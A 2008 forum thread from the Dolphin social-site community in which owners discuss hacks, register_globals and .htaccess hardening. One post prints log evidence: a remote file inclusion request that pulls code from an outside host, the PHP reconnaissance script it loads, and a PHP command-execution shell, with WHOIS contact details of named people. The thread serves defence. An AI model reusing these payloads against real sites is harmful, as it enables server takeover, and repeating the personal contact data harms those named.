// set default encoding for multibyte functions
mb_internal_encoding('UTF-8');

//--- Ray Integration ---//
require_once($dir['root'] . "ray/modules/global/inc/header.inc.php");
require_once($dir['root'] . "ray/modules/global/inc/content.inc.php");
//--- Ray Integration ---//
?>

 

 

And by the way if no one else has ever said it DOSDAWG IS THE MAN!  For no real reason that I can see he worked for two days getting me back up I highly recommend that you give this man business, you will get your money's worth!

 

 

Signed Roy

12 Jul 2008

2. 777 dirs ARE insecure... even more so on a host like Hostforweb that has php running as a module. My only advice is to make SURE you have an .htaccess in each 777 dir that blocks any script from running.

When you mention using htaccess to secure a dir that has 777 perms, do you mean with a simple "Deny From All" ?

12 Jul 2008

of all those who proclaim they have been hacked, please provide us with who your host is, and also would like to look at your phpinfo(), yeah the host tells you that register_globals=OFF, but have you verified that? there are a few scripts that require register_globals to be on, exactly why, i do not know, but those are scripts i would not run.

im just curious as to where all of you guys are hosted, and would like to verify that register_globals=OFF. so i see what AndreyP is posting, i know on tallyplayer, his register_globals were on. i am sure he believed them to be turned off, but you will find that if james with a hosting account that he is paying 25 dollars a month for, is asking for register_globals to be turned on, and you are hosting on that same account for $1.99 and you want register_globals to be off, what do you think they are going to do?

well i can tell you its evident: when in rome do as the romans, they turn them on, and expecting you to never view your phpinfo(), nor read your server logs, they just get away with it.

well that is just my 3 cents worth. gotta go got things to do, good luck to all, and hope things shake out.

later,
DosDawg

Isn't it possible to set reg-Globals on/off on a per-account basis?  Or does that depend on the way php has been compiled (Apache vs CGI)?

I still really don't get why not fix the holes rather than the band-aid approach of turning Register Globals off and assuming that will just 'deal with it'.  That just makes no sense to me at all.

12 Jul 2008

I can use .htaccess  files on my sserver... I was told I can add "php_flag register_globals 0" to my file...

which .htaccess do I add it to? Do I need to add it to all of them? and where in the file do I add that line?

Hakk

12 Jul 2008

Yes if you are going to do it through the .htaccess files it must be each one in each directory, actually, each directory that hass 777 chmod.   I would do each to be sure.

 

 

Tired,

Reginald

12 Jul 2008

Ok my sites are operational.  The hacks that have left you with attacked by turks or owned by spanish hackers has probably written over your inc/header.inc.php file.  This file creates with the questions you were asked at install to fill in.  Simply remembering that info and plugging it in to a template, then placing it in your yoursite/inc/header.inc.php will fix most of the problem.  From there like I said earlier you need to look at a lot of files to make sure they did not leave any malicious content behind.  So that leaves us with the obvious question, Where do I get a header.inc.php template?

Try this for version 6.1.2:  just fill in the yellow highlights with your info put in notepad or editor name header.inc.php and copy it to you inc/ directory.

.....

.....

Signed Roy

Roy,

Also make sure you delete the files they used to upload to your site...

in  my case

they added files in the

following folders

cache

langs

temp

media

orca

backup

(probably more)

one thing that would help me (since I did do an upgrade) is there a complete list available with files and what directories they are in so I can delete ALL files that do not belong to the program.

hakk

12 Jul 2008

First thing to do is to determine if register_globals is on or off. You can login to your admin panel first then visit:
yoursite.com/admin/phpinfo.php

Scroll down until you see register_globals
You should see to columns local and master. Master is what you host has specified. And local would be your site/directory. You can over ride your hosts master value by using .htaccess on php apache servers or php.ini with cgi servers.

The code varies slightly.

For php apache servers add to your main .htaccess file yoursite.com/.htaccess:
php_flag register_globals off

For cgi servers add to or edit your current php.ini file in yoursite.com/php.ini:
register_globals = Off

If you don't have php.ini make one with the above line and call it php.ini (cgi-servers only)
Else ask your host for certain and/or exact location to put php.ini

Go back to yoursite.com/admin/phpinfo.php and refresh page to verify the changes were successful ie...register_globals changed from on to off for certain in the local value, but if both local and master change that is ok too.

gameutopia

DialMe.com - Your One and Only Source For Boonex Dolphin Tutorials and Resources
12 Jul 2008

hakknslash: About the "register_globals" line... if you are using a host that allows php options to be set in the .htaccess you will only have to put it in one file. The .htaccess file in the root directory, because .htaccess files are recursive so whatever you put in one effects all subdirectories. If you have to set them in php.ini files then it depends.. some hosts are setup to read from a master php.ini (which you can't access in some cases) and some read from multiple files.

 

kevinmartin: "deny from all" works in directories where the files are just included in other files (like the cache directory) but you can't use it in any of the directories that have uploads or pictures, if you do you won't be able to access them. Here is what I put in all the 777 dirs that are for uploads:

 

<LimitExcept GET>
order deny,allow
deny from all
</Limit>

<FilesMatch "\.(cgi|pl|py|bak|txt|htaccess|htpasswd|log|zip|asp|sh|shtml|jsp|gz|tgz|tar|php.*|htm.*)$">
Deny from all
</FilesMatch>

 

 

You can add any extension you want to that list.. then if they do get files in your directory they can't do anything with them :-)

 

Also, two rules to live by... no matter HOW secure you are still check your 777 dirs frequently and backup your whole server up once or twice a week!

 

Mike

BoonEx Certified Host: Zarconia.net - Fully Supported Shared and Dedicated for Dolphin
12 Jul 2008

Humorous hackers :)
Has anybody read this before?
http://www.php.net/register_globals manual

So we don`t see here any issue for this

It seems that no one that was hacked seems to find it as funny as you

do which seems strangely odd to me anyway!

Do you see any "ISSUE" now AndreyP ?

What about YOU Boonex ???  You are VERY quiet!

12 Jul 2008

As someone who spent 48 hours getting "unhacked" I place no discontent at the feet of Boonex.  They have provided free of charge an outstanding platform to enhance my websites far beyond anything I could have done.  I think the intent has always been for THIS community to be a place to discuss problems and devise solutions.  In the interim I hold pretty good faith that the Boonex develpment team is working to insure that future releases are a little better and a little more secure than previous.  No I did not find it funny, but my anger was towards the malicious code writers not those trying to do something positive with their skills in code.  Disgruntled for the lack of direction, a little, but I learned a lot, and made some invaluable alliances along that path, namely DosDawg.  I believe that;s what Boonex had envisioned with this community, yes?

 

 

Signed,

Roy

12 Jul 2008

hakknslash: About the "register_globals" line... if you are using a host that allows php options to be set in the .htaccess you will only have to put it in one file. The .htaccess file in the root directory, because .htaccess files are recursive so whatever you put in one effects all subdirectories. If you have to set them in php.ini files then it depends.. some hosts are setup to read from a master php.ini (which you can't access in some cases) and some read from multiple files.

 

kevinmartin: "deny from all" works in directories where the files are just included in other files (like the cache directory) but you can't use it in any of the directories that have uploads or pictures, if you do you won't be able to access them. Here is what I put in all the 777 dirs that are for uploads:

 

<LimitExcept GET>
order deny,allow
deny from all
</Limit>

<FilesMatch "\.(cgi|pl|py|bak|txt|htaccess|htpasswd|log|zip|asp|sh|shtml|jsp|gz|tgz|tar|php.*|htm.*)$">
Deny from all
</FilesMatch>

 

 

You can add any extension you want to that list.. then if they do get files in your directory they can't do anything with them :-)

 

Also, two rules to live by... no matter HOW secure you are still check your 777 dirs frequently and backup your whole server up once or twice a week!

 

Mike

-----------------------------------------------------

hi, Which directories would you put this code?

 

Thanks,

 

Stuart

There are none so blind as those that will not see.
12 Jul 2008

Stuart you would want to add that code to any .htaccess file that is in a directory with a 777 permission. If a 777 directory does not have a .htaccess create one with that code and upload it to there such as in ray/modules/movie/files/.htaccess

with that code.

Pretty much any and all 777 folders/directories. 777 folders/directories are the ones that are most likely to get hit with anything. They should be checked periodically just to see if anything odd is in there.

gameutopia

DialMe.com - Your One and Only Source For Boonex Dolphin Tutorials and Resources
12 Jul 2008

Safehtml is a 3rd party script. It's not made by boonex/dolphin company, and a lot of other php scripts also use it so it could potentially be a major problem for a lot of others. Basically safehtml strips harmful code that a member of your site might enter in say a blog post. That little editor you use to type a blog is just one. Now if they enter malicious code safehtml automatically strips it. So it's main purpose is good and to protect your site. So this is very ironic that something intended for good is being exploited by a hacker.

DialMe.com - Your One and Only Source For Boonex Dolphin Tutorials and Resources
12 Jul 2008

I was hacked everytime i put in a fix or restored my site from a backup.. Hacked BIG time..

very depressing ...lol been down for a week now

I emailed my host about it but they weren't alot of help in this area, basically asked me to check each file and for unusual code...

12 Jul 2008

Hello gameutopia,

 

I was trying to find out which directories had files with 777 permissions!

 

Regards,

 

Stuart

There are none so blind as those that will not see.
12 Jul 2008

Ohh again :)

why you even can`t goto

Members -> Boonex Team

Here all Boonex staff, thanks for alls

so again,

you should have

php_flag register_globals Off
to prevent been hacked

all hosts must provide this variable as 'Off' by default.

If not - this is not secure host

If your hosting don`t give possibility to use .htaccess ask your host to enable this possibility and even switch

php_flag register_globals Off
this is common security issue, strange that your host don`t provide this, which version of php it use? 3.0? :)

since 4.2 this variable is Off as default

Regards,

BoonEx staff

Andrey,

the problem with that is if you have php_flag register_globals= off, that is only protecting that directory. i was informed that you need to have this line

php_flag register_globals 0

this supposedly stops register_globals site wide rather than just on that directory with the htaccess.

if somebody finds out different, then please let us know.

i have been helping tallyplayer, and we are basically battling with ixwebhosting.com to get the register_globals turned off. they initially said that it was the scripts fault, and they sent some excerpt relating to 3rd party scripts, and saying it was the users responsibility to ensure the safety and security of the site. well i find this to be a ridiculous statement. what are you paying them for, if they are not monitoring the servers to ensure this kind of crap isnt going on on their servers?

tally contacted support and they basically gave him some lame lines about it was the scripts fault. i logged into his support and got in touch with a tech named artem, who at first tried to ignore me with my requests, then ultimately he decided to help, and also apologized. i know an apology does not fix what was wrong, but just the fact that he acknowledges that it was an error with the server, and not so much the script, was satisfaction for me.

ok all, good luck,

DosDawg

When a GIG is not enough --> Terabyte Dolphin Technical Support - Server Management and Support
12 Jul 2008

guys,

after some research and reading multiple posts on here, it is my determination that DOLPHIN is NOT the PROBLEM.

IT IS YOUR SERVERS SETTINGS, as with most issues with this dolphin script, if you read the server requirements, you will find that you have chosen the wrong host. this has nothing to do with the dolphin developers, and i presume that every open source script i have ever used or read about has been attacked by those who have nothing better to do in their life.

tighten up your server ask support to tighten up your server, if that is not possible, then consider moving to a server where you have more control over what is allowed or disallowed.

later,

DosDawg

When a GIG is not enough --> Terabyte Dolphin Technical Support - Server Management and Support
12 Jul 2008

First off... Thank you all for identifying the hack problem and providing solutions that can prevent the breach.  Just to summarize and make sure I am doing the right things:

1. I have added php_flag register_globals 0 to the .htaccess file in the main directory used for Dolphin.

2. I have added to <IfModule mod_rewrite.c></ifModule>


RewriteCond %{QUERY_STRING} ^http   [OR]
RewriteCond %{QUERY_STRING} ^.+www\.  [OR]
RewriteCond %{QUERY_STRING} ^.+https  [OR]
RewriteCond %{QUERY_STRING} ^.+ftp
RewriteRule .* - [L,F]
RewriteCond %{HTTP_USER_AGENT} ^libwww [OR]
RewriteCond %{HTTP_USER_AGENT} ^Wget
RewriteRule .* - [F]

RewriteCond %{QUERY_STRING}   (.*)=http(.*)   [NC,OR]
RewriteCond %{QUERY_STRING}   (.*)urlx=(.*)   [NC]
RewriteRule ^(.*)  - [F]

3. For directories identified with  >$ 'find . -perm 777 -type d', I have added this to each of the .htaccess file

<LimitExcept GET>
order deny,allow
deny from all
</Limit>

<FilesMatch "\.(cgi|pl|py|bak|txt|htaccess|htpasswd|log|zip|asp|sh|shtml|jsp|gz|tgz|tar|php.*|htm.*)$">
Deny from all
</FilesMatch>

Is there anything else I need to do?  Have I done anything that will have an adverse impact on the way Dolphin/Ray/Orca are supposed to work?

Suggestion.  Seems like someone could write a small shell script to indentify the 777 directories, open the files, go to the last line and insert the necessary code.

Once again, thank you ALL very much for your help and attention to this potential security problem!!

Arthur

12 Jul 2008

I would request from Team Boonex, if they know what really needs to be in the .htaccess to close this loop, that they please include this in the install script or hopefully add it to the next upgrade, yes?

 

 

Roy

12 Jul 2008

I would request from Team Boonex, if they know what really needs to be in the .htaccess to close this loop, that they please include this in the install script or hopefully add it to the next upgrade, yes?

Roy

2nd that motion

When a GIG is not enough --> Terabyte Dolphin Technical Support - Server Management and Support
12 Jul 2008

I just got hacked a little while ago. Got an email from user "ajaysanhotra" using Praveen's name and an hour later I'm looking at the powered by logo and a few other small issues. I got their IP's, seems to be two of them working it.

denied 118.0.0.0/8  and  129.0.0.0/8 until I can fix this.

12 Jul 2008

I was hacked too!!! in my two hosting sites!!!!!

What is the chance that they also GOT ACCESS TO THE DB INFORMATION??!!! or just they have the email details????

My webspace was blocked and I even can't look on my files.... SHAME!!!!

I'll have to wait and see if it's the software (Dolphin) or the Hosting.

Also I found and reported that Ray is sending request all the time and I'm not sure that that is not a security bridge!!! What information it's sending and who can hacked it when it's send?? Any INFORMATION on this regards?????

12 Jul 2008

One more comment:

In the Header.inc.php the password to the admin is NOT encrypted. Means in any giving time they have access to the WHOLE site administration????

What about the profile caching files? do they have access to these files too????

Is this not a hole in the software?

Now we'll have to investigate what kind of security bridge there are in this platform. I'm not sure it's just the .htacce

12 Jul 2008

We have been working with the Hosting division of Dolphin Geeks and found that no sites have been compromised.

 

We had one user that had their inc and periodic directories set at 777 and the files within the periodic directory set at 666. Since they advised that they received an email after being contacted by someone requesting their site details we are assuming that this site was specifically being targeted. We have corrected their file settings. Other than that all has been well.

 

By default register_globals are set to off on all servers.

 

I agree with the site owners that have stated that there are going to be vulnerabilities in all software as nothing is completely hacker-proof. Discussions as we have here are what allow us to correct the errors and protect our sites.

 

It's true 2 heads are better than one or in this case 15 heads are better than one. ;)

 

Dolphin Geeks

12 Jul 2008

Dolphingeeks, your cheapest hosting plan is $14.95 a month.. that is three times the price of most other hosting companies. Is that for a VPS or something?

12 Jul 2008

Hi EdHandy,

 

You are correct that the cheapest hosting plan is $14.95. This price is higher than traditional hosts. This is because our offer includes configuring your site for Ray Media Server, testing your site for video and music uploads, and video chat.

 

No need to worry about video and music upload errors or Orca Errors. We offer free support for these errors and as a result all sites that are hosted on our servers run error-free with regards to the basic dolphin features.

 

We only do hosting for Dolphin Sites. Therefore our server configurations are specifically geared to the Dolphin Script.

 

We do not host hundreds of sites on each server. We only host 30 to 60 per server or less. This allows your site to run faster than traditional hosting companies as they have to run a generic configuration to accomadate as many hosting clients as possible. This is where so many site owners are having problems. 

 

If the hosting configuration is configured for Dolphin it will run without errors. The pricing is because of the free configuration and maintanence of a small amount of sites on 1 server.

 

If you factor in all of the headaches of dealing with traditional hosts related to Dolphin we are sure you will come to the conclusion that our slightly higher prices are well worth it on the long run.

 

Dolphin Geeks

12 Jul 2008

Is there an official fix for this yet?

My site was hacked right after I registered it and paid the license fee.  My site had no links to it and I was still testing it before at launched it.

I have several other free dolphin sites unregistered and I have had no problems with them.

The hackers must be pulling the urls off of unity/boonex.

12 Jul 2008

 

 

We do not host hundreds of sites on each server. We only host 30 to 60 per server or less. This allows your site to run faster than traditional hosting companies as they have to run a generic configuration to accomadate as many hosting clients as possible. This is where so many site owners are having problems. 

 

At $14.95 a month you won't ever have to worry about hosting hundreds of sites Cool 

12 Jul 2008

guys,

after some research and reading multiple posts on here, it is my determination that DOLPHIN is NOT the PROBLEM.

IT IS YOUR SERVERS SETTINGS, as with most issues with this dolphin script, if you read the server requirements, you will find that you have chosen the wrong host. this has nothing to do with the dolphin developers, and i presume that every open source script i have ever used or read about has been attacked by those who have nothing better to do in their life.

tighten up your server ask support to tighten up your server, if that is not possible, then consider moving to a server where you have more control over what is allowed or disallowed.

later,

DosDawg

It all seems well and good to take this approach - let's call it the 'Not My Problem' approach (from Boonex's point of view).

But as I have said more than once in this thread - with no reply - why not fix the problem, instead of relying on clients to always get it right with register_globals? The simple facts of the matter are:

1. The majority of users would not know a global variable if it hit them in the face (and indeed they shouldn't be expected to in my view - they want to be end-users not techs and that is their right)

2. A lot of hosts do not have RG off by default.

In the face of that, perhaps you can see it as 'going the extra mile' to simply improve the code so it isn't vulnerable to Register_Globals based attacks? Is it really so invalid to think about protecting your users as much as possible? Simply because its easier not to bother?

Since the 'official' response from Boonex was to tell us to read up on RG at php.net - let's go with that:

http://www.php.net/register_globals

... and I quote from that page, paragraph 1 "... keep in mind that the directive itself isn't insecure but rather it's the misuse of it."

13 Jul 2008

We have been working with the Hosting division of Dolphin Geeks and found that no sites have been compromised.

We had one user that had their inc and periodic directories set at 777 and the files within the periodic directory set at 666. Since they advised that they received an email after being contacted by someone requesting their site details we are assuming that this site was specifically being targeted. We have corrected their file settings. Other than that all has been well.

By default register_globals are set to off on all servers.

I agree with the site owners that have stated that there are going to be vulnerabilities in all software as nothing is completely hacker-proof. Discussions as we have here are what allow us to correct the errors and protect our sites.

It's true 2 heads are better than one or in this case 15 heads are better than one. ;)

Dolphin Geeks

Ah - its always nice to see someone use a situation like this to shamelessly advertise their own services :)

13 Jul 2008

We do not host hundreds of sites on each server. We only host 30 to 60 per server or less. This allows your site to run faster than traditional hosting companies as they have to run a generic configuration to accomadate as many hosting clients as possible. This is where so many site owners are having problems.

At $14.95 a month you won't ever have to worry about hosting hundreds of sites Cool

edhandy,

just to let you know that if you are looking for $1.99 hosting, there is plenty out there for you, but i can assure you that you will be faced with many headaches and heartaches. so you think dolphin hosting should be $3.99? let me explain a little something to you about hosting sites and maintaining a server. First of all, you have to do one of two things, you have to purchase the equipment, or lease the equipment, there are pros and cons for either approach. now you have the servers, great, and i did use the plural of that word server(s), as you are not going to be doing a very good job trying to host anybody with one machine. so now you have to find a data house to locate that equipment, "say what" yes ed, you dont put these machines in your garage and offer business hosting, these machines are stored in a data warehouse, climate controlled, with the power and data transfer sources being secured and backed up.

ok so now you have a machine in a data warehouse, you have purchased your choice of transfer rate from the data center, and start configuring your equipment. everything is going good, now servers are purchased, servers are located, configured and ready to go. now what? well i tell you what, you have to most likely sink thousands if not hundreds of thousands into advertising in order to get known to the internet, and global population. and ed, all of this is without making the first penny.

and you think in your mind, that you deserve $1.99 hosting. catch geocities or something dude, angelfire is still giving free hosting i am sure. if you find you a free host that will run dolphin for you, then good for you. we wont even talk about my hosting price, as my hosting starts @ twice the rate you are complaining about. so if you are not ready to spend money for a good hosting provider, then you are going to suffer the consequences later down the line.

so my point is here ed, is that you have no clue what it takes to operate a hosting environment, and i would compare this to you going to the local market and telling the merchant that they are asking too much for their product. ed, its their product, either you are willing to make that purchase, or you are taking your business down the line.

and to compare $1.99 hosting with a hosting provider that has configured their server to efficiently run the dolphin script, is like comparing the speed of a turtle to the speed of a rocket ship, there is just no comparison.

well i am done with that one, but i hope you understand ed, none of this is free. you got the script free, now you are looking for free hosting. good luck, and report back every time your site goes down, and be sure to blame on the inadequacies of the script of course.

later,

DosDawg

When a GIG is not enough --> Terabyte Dolphin Technical Support - Server Management and Support
13 Jul 2008

Which version of APACHE are you running? Most hosting platforms are running 1.3.3? I am going out on a limb here but I have always power Dolphin in Apache2.2+ and PHP5.2+ and have never had many of the issues or current hacks you all express. I have been following the Web2.0 Architecture and from what I can put together learning Apache2.2 provides insite to past insecurities which is why the rewrite. This leads to PHP insecurities as well as some cPanel security issues which have all been addressed in the new script writes. My server has been splashed a great deal in the past few days with many trying to exploit the files referred to in here with no avail. My 404error log is going up dramatically everyday, but my sites are fine. I have to stand behind BoonEx on this one. It's not Dolphin but the server hosting platform configuration and a possible 1.3.3 and PHP4 exploit.

 

 

13 Jul 2008

Which version of APACHE are you running? Most hosting platforms are running 1.3.3? I am going out on a limb here but I have always power Dolphin in Apache2.2+ and PHP5.2+ and have never had many of the issues or current hacks you all express. I have been following the Web2.0 Architecture and from what I can put together learning Apache2.2 provides insite to past insecurities which is why the rewrite. This leads to PHP insecurities as well as some cPanel security issues which have all been addressed in the new script writes. My server has been splashed a great deal in the past few days with many trying to exploit the files referred to in here with no avail. My 404error log is going up dramatically everyday, but my sites are fine. I have to stand behind BoonEx on this one. It's not Dolphin but the server hosting platform configuration and a possible 1.3.3 and PHP4 exploit.

just to shed some light on your post. most phpinfo() files i have checked, i dont think any of them were running apache 1.3.3, and none were running php4. so where i believe its a valid point with what you say about staying updated with your system software is critical. but i think the larger problem is that these guys are on shared hosting environments, and they have master value register_globals on, and then the fact that dolphin has several directories with 777 perms. so there is a combination of issues that create the pipeline for those little bastards to hack a site.

i think after this episode there are going to be some who have learned from this and some who dont. the other problem i have seen and think is just poor judgement on behalf of any individual trying to run this script or any similar script. NO BACKING UP. the tools are there for you to backup, and you should in all cases use it. to come in here and not have a backup to restore your site no matter what happens, you are non-deserving of help from anybody.

i say this and i cant tell you when it was i last time i made an adjustment to a site without backing up. as you know or i hope you know, that every good programmer always states to you that you need to first backup. if you fail to heed that warning, you get what you have coming to you. is this harsh to have this belief, i think not, its the facts, and there are some things in life you cannot change, and "facts" is one of them.


i do wish all who are suffering peril at this time the best of luck in getting your sites back up and running, and sincerely hope that you have come out of this with a lesson learned.

later,

DosDawg

When a GIG is not enough --> Terabyte Dolphin Technical Support - Server Management and Support
13 Jul 2008

Yeah I did some further Log investigation and found http://www.cdpm3.com as the site trying to run a script against me via the SAFEHTML folder. It fails because it can not find a wrapper to incase it's garbage in. And it is definately floating IPs. I'll get mad in a few minutes :0

 

I do SECOND AND THIRD your IMPORTANCE of BACKING UP your stuff. A few minutes, couple of times a week...PRICELESS!

 

Well it is definately an embedded script on other site(s)

//ray/video/skins/index.php?sIncPath=http://www.yogyacardus.com/var/echo.txt??
  Http Code: 404 Date: Jul 12 21:45:09 Http Version: HTTP/1.1 Size in Bytes: -
  Referer: -
  Agent: libwww-perl/5.805

I'll see what I can discover...

 

Notes:

Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.7a DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fastcgi/2.4.6 Server at yogyacardus.com Port 80

 

Administrative Contact:
   YogyaCardUS
   Zohra Perry (zohrapery@gmail.com)
   +1.3058191951
   Fax: none
   7060 Torphin Place
   Miami Lakes, FL 33014
   U

 

 

<?
echo "ghareng<br>";
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER['SERVER_NAME'];
$alb8 = gethostbyname($SERVER_ADDR);
$alb9 = get_current_user();
$os = @PHP_OS;
echo "os: $os<br>";
echo "uname -a: $alb<br>";
echo "uptime: $alb2<br>";
echo "id: $alb3<br>";
echo "pwd: $alb4<br>";
echo "user: $alb9<br>";
echo "phpv: $alb6<br>";
echo "SoftWare: $alb5<br>";
echo "ServerName: $alb7<br>";
echo "ServerAddr: $alb8<br>";
echo "YogyaCardUS ONLINE<br>";
exit;
?>

Registrant:
Department of Disaster Prevention and Mitigation
3/12 Utongnok  Road
Dusit, Bangkok 10300
TH

Domain name: CDPM3.COM


Administrative Contact:
    Phopapapan, Supakit  psupskit@yahoo.com
    3/12 Utongnok  Road
    Dusit, Bangkok 10300
    TH
    +662-241-4403    Fax: +662-241-4403

 

<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;
-------------------------------------------------

 

Thailand...Figures. Are far as I can tell they are definately exposing the passthru functions. These are the last 2 sites and attacks I took and the code they produce via there site to try to take over my Dolphin. Basically trying to override the Admin creditials providing access to site ADMIN.

 

I believe my Globals On is defeating this attack. Why? I don't know yet but it is the only thing I have configured for a very specific reason on my plat. Because Globals was such an issue in the old ways the new ways dramatically approach globals entirely new. So over the last year I have tested it's new way per say and am currently impressed but...

 

The attacks are definately focused on the Unity Family of Communities...And since I am not affected I am reluctant to find a solution...However curious to why I am not affected in the Web2.0 with Globals On.?

To be continued...Off to Apache and PHP see what I can find out...

 

-------------------------------------------

Well this is a sweeping NET attack not BoonEx specific but certain SERVER platform configuration will be at risk. The hacks on Dolphin are more annoyances but this is ultimately the type site(s) they are after http://www.goerie.com/apps/pbcs.dll/article?AID=/20080630/NEWS07/806300452/-1/NEWS

 

After reviewing my Log File I gathered a list of contributing sites to this hack although I am sure there are thousands more:

 

 

www.geocities.com

 

 

 

www.yogyacardus.com
www.legion-of-nemesis.eu
www.swh.org
www.proostjes.be
www.concurs.org
http://inside-asia.com/mambots/system/id.txt???xml.inc.php

I am sure most ServerFarms will have this isolated in a few days/weeks? possibly.

13 Jul 2008

Hi,

Just to add a little bit of info here. I have seen these so called hacker sites for a few years now. If any of you ever wonder why they never get shut down it is because these are supposed to be legitimate security sites that address security holes in popular software.

I have not looked into it but I'm told they have sections that explain how to fix holes and how to increase the security of your site.

Appearntly all they want to do is make the web a safer place. The fact that hackers then use the site to exploit the holes in the software is a side effect that no one wants.

But, with that said, the point of doing what they did is to force the software developers to fix the issue. So can Boonex fix this hole? Is it going to happen?

I dont necessarily agree with how the site operators work.... But at least in this instance we hope that Boonex will take note and fix the problems.

In their Blog, boonex are now asking people to submit recommendations for their next version of Dolphin. Perhaps if everyone went over there and submitted a request for "a more secure version of Dolphin, maybe with less bells and whistles, but less likely to get hacked" we might get them to actually build a new version with some of the security holes closed.

http://www.boonex.com/unity/blog/entry/Dolphin_6_2_Ray_3_6_Orca_2_1_Now_In_Works

Cheers

Max

13 Jul 2008

i am at globat. they suspended my account for spamming...and they reactivate it... i deleted the htmlsax3....and i tried to setup my htaccess. i asked them if they support htaccess. the said only in folders with permissions 755. so what i did is to change my folders' permissions from 777 to 755. what now?  will be any problem with this?

13 Jul 2008

Hi,

Just to add a little bit of info here. I have seen these so called hacker sites for a few years now. If any of you ever wonder why they never get shut down it is because these are supposed to be legitimate security sites that address security holes in popular software.

I have not looked into it but I'm told they have sections that explain how to fix holes and how to increase the security of your site.

Appearntly all they want to do is make the web a safer place. The fact that hackers then use the site to exploit the holes in the software is a side effect that no one wants.

But, with that said, the point of doing what they did is to force the software developers to fix the issue. So can Boonex fix this hole? Is it going to happen?

I dont necessarily agree with how the site operators work.... But at least in this instance we hope that Boonex will take note and fix the problems.

In their Blog, boonex are now asking people to submit recommendations for their next version of Dolphin. Perhaps if everyone went over there and submitted a request for "a more secure version of Dolphin, maybe with less bells and whistles, but less likely to get hacked" we might get them to actually build a new version with some of the security holes closed.

http://www.boonex.com/unity/blog/entry/Dolphin_6_2_Ray_3_6_Orca_2_1_Now_In_Works

Cheers

Max

avhow,

just to touch on some of your concerns and remarks regarding the dolphin scripts security. it would really not matter what boonex does from the development standpoint, if the user who installs this does not comply with certain requirements for operating the site. my main point here is this. with register_globals=on, the site is open to exploits such as this RFI, there is nothing wrong with writing a program that does remote file inclusions, that is they most all dynamic sites work, that is done for many reasons, but that is not the topic of discussion here. so if you know you need certain requirements to run the dolphin script, and you opt to go another route, then you are putting yourself in harms way.

i wish more would pay attention to what needs to be done to run this script successfully, and there would be far less complaints about any of this. but we as a community can get through this, and eventually it will go away.

avhow, this basically reminds me of locking all your doors but leaving your windows wide open. DUH, if the burglar comes, he is going to get in. and remember, a lock dont stop a theif, only keeps an honest man honest. so no matter what boonex or any other developer does for security, there is always going to be something that is going to be tried by these people who have nothing better to do with their time.

later,

DosDawg

When a GIG is not enough --> Terabyte Dolphin Technical Support - Server Management and Support
13 Jul 2008

Hi,


I see your point. What that means then is basically the hackers are telling the world that a certain exploit exists BUT if the Dolphin users had only used a host with the Register_Gobals Off then they would not be affected.

So basically anyone who has had their site hacked should take notice that they are using a host that has Register_Globals On and is therefore lacking in security.

In my mind the solution to this would be for Boonex to put more emphasis on that in the Installation recommendations (I know they already mention it but it is bunched in with all the other specs). They should tell people that it is EXTREMELY important to make sure those settings are Off for the security of the site.

Then instead of recommending a single host (that is known to have lax security from what I have been told on these forums) they should recommend a few more hosts that have known good security.

Thanks for your info. Dos Dawg.

Cheers

Max

13 Jul 2008

Sooo,,,,for a week now I've continued to be hacked each and every day.  I've had to replace my index.php a few times, and of course the ray/modules/globals/inc/content.inc.php a few times.

 

I also have had strange files show up in my root....one of them is scan.php?  When run this opens up my site in a c99 shell format.  I'm just totally screwed with my HOST ....

 

My HOST is a paid Yahoo hosting plan.  They said, they are sorry but since this is a shared server they cannot do anything but I could suggest this with their Engineers as a possible suggestion to consider.

 

I take it I'm supposed to delete this scan.php? file.  It is written by a group called:  w4cking-shell(Private Build v.0.3). This of course comes from https://w4ck1ng.com/ site.

 

I've continued to delete files from the TMP folder also that look very strange.  Along with other strange files.  Looks like I am just going to have to SWITCH HOSTS afterall.  Its too bad as my site as really taken off and the few hundred customers really like the Dolphin script.  But I just don't have the time to keep up with this type of activity.

 

Ok, back to deleting strange files.....

 

DoLaugh 

13 Jul 2008

I was also hacked twice, I was lucky in the fact that my site hadn't launched.  After the hack and reading this and other forum threads on this subject I am now trying to figure out the best way to proceed.  I am not an expert and in fact have hired out most of the install and update work on my site.  Here are the two things I am pondering now any input and comments will be helpful.

1.  From what I can tell this is hacking seems to be a bigger issue with 6.1 is it smarter safer to return to 6.0?

2.  The other issue seems to be a hosting issue.  I would love to see a list or get some input on where you are hosting if you got hacked or not.

Thanks For your help & Input!

texaseagle

13 Jul 2008

I make it a rule to never post my site's URL on any forum for help .... that includes Dolphin, phpBB2, Coppermine, SMF etc.

My site is running under Free License (still has Dolphin links) with Register_Globals off.

I have not been hacked. Running V6.1.1.

Is there an official fix for this yet?

My site was hacked right after I registered it and paid the license fee.  My site had no links to it and I was still testing it before at launched it.

I have several other free dolphin sites unregistered and I have had no problems with them.

The hackers must be pulling the urls off of unity/boonex.

13 Jul 2008

Hi,


I see your point. What that means then is basically the hackers are telling the world that a certain exploit exists BUT if the Dolphin users had only used a host with the Register_Gobals Off then they would not be affected.

So basically anyone who has had their site hacked should take notice that they are using a host that has Register_Globals On and is therefore lacking in security.

In my mind the solution to this would be for Boonex to put more emphasis on that in the Installation recommendations (I know they already mention it but it is bunched in with all the other specs). They should tell people that it is EXTREMELY important to make sure those settings are Off for the security of the site.

Then instead of recommending a single host (that is known to have lax security from what I have been told on these forums) they should recommend a few more hosts that have known good security.

Thanks for your info. Dos Dawg.

Cheers

Max

avhow,

